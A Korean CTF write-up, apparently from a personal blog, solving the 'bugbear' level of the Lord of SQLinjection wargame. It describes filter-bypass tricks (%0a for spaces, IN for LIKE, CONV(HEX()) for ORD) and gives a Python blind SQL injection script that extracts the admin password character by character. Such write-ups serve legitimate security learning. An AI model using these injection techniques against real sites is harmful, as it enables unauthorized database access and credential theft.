๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐ŸดCTF/Lord of SQLinjection

Lord of SQLinjection - bugbear

by Janger 2021. 12. 7.
728x90
๋ฐ˜์‘ํ˜•

์ด๋ฒˆ์—๋Š” ๋ฌด๋ ค ๊ณต๋ฐฑ๊ณผ OR AND๋ฅผ ์ œ์™ธํ•˜๊ณ , LIKE๋„ ํ•„ํ„ฐ๋ง์ด ๋œ๋‹ค. 

 

 

 

๊ณต๋ฐฑ์€ %0a๋กœ ์น˜ํ™˜ํ•˜๊ณ , LIKE๋Š” IN์œผ๋กœ ๋Œ€์ฒดํ•˜๋ฉด ๋œ๋‹ค. 

 

๊ทธ๋ฆฌ๊ณ  ์ธ์ ์…˜์„ ํ•˜๋˜ ์ค‘ ORD ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜๋ ค๊ณ  ํ•˜์ž OR ํ‚ค์›Œ๋“œ๊ฐ€ ํฌํ•จ์ด ๋˜์–ด์žˆ์–ด์„œ ์‚ฌ์šฉ์ด ๋ถˆ๊ฐ€๋Šฅํ–ˆ๋‹ค. 

๊ทธ๋ž˜์„œ ํ•˜๋Š”  ์ˆ˜ ์—†์ด ORD๋ฅผ HEX๋กœ ๋Œ€์‹  ์‚ฌ์šฉํ•˜๊ณ  ์—ฌ๊ธฐ์— CONV ํ•จ์ˆ˜๋ฅผ ๋”ํ•ด์„œ 16์ง„์ˆ˜๋ฅผ 10์ง„์ˆ˜๋กœ ๋ณ€๊ฒฝํ•ด ์ฃผ์—ˆ๋‹ค. ๊ทธ๊ฒƒ๋งŒ ์ˆ˜์ •ํ•˜๋ฉด ์ด์ „์˜ ์ž๋™ํ™” ์†Œ์Šค๋ž‘ ๋น„์Šทํ•˜๋‹ค. 

 

 

import requests

parameter = None



cookie = {'PHPSESSID':'์ž์‹ ์˜ ์ฟ ํ‚ค ๊ฐ’์„ ์ž…๋ ฅ'}

result = None

solve = ""
	
for i in range(1, 8+1):
	

	for ascii in range(48, 112+1):
		print(ascii)
		parameter = "?pw=NULL&&no=0||id in(\"admin\") %26%26 CONV(HEX(MID(pw,{},1)),16,10) IN ({})%23".format(i, ascii)
		parameter = parameter.replace(" ", "%0a")
		url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php" + parameter
		result = requests.get(url=url, cookies=cookie).text
		if "Hello admin" in result:
			print(i, ascii, chr(ascii))
			solve += chr(ascii)
			break
			
print( solve )

 

 

 

์ฐธ๊ณ : 

https://stackoverflow.com/questions/15085858/convert-hex-column-to-dec-in-mysql

 

Convert HEX column to DEC in MySQL

I am writing an application which will do some formatting to CSV file and uploads the table to mysql after that the program should convert a (hex) column to decimal one The table looks like this: ...

stackoverflow.com

 

728x90
๋ฐ˜์‘ํ˜•

'๐ŸดCTF > Lord of SQLinjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Lord of SQLinjection - assassin  (0) 2021.12.08
Lord of SQLinjection - giant  (0) 2021.12.08
Lord of SQLinjection - darkknight  (0) 2021.12.07
Lord of SQLinjection - skeleton  (0) 2021.12.07
Lord of SQLinjection - vampire  (0) 2021.12.07

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”